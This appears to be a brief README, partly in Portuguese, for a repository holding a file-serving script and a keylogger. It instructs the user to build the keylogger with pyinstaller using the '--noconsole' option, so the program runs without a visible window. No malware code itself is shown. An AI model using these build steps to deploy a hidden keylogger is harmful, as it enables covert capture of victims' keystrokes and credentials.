jhonnunes443/Security_folder/README.md

 ENVIADA DO SERVIDOR COLOQUE O ARQUIVO OU PASTA DESEJADA NA MESMA PASTA ONDE O ARQUIVO('server.py') ESTÁ SENDO EXECUTADO.

+To make your keylogger run you need install the pyinstaller and run this comand in your console:

+pyinstaller --onefile --noconsole main.py

 creditos: Jhonnunes443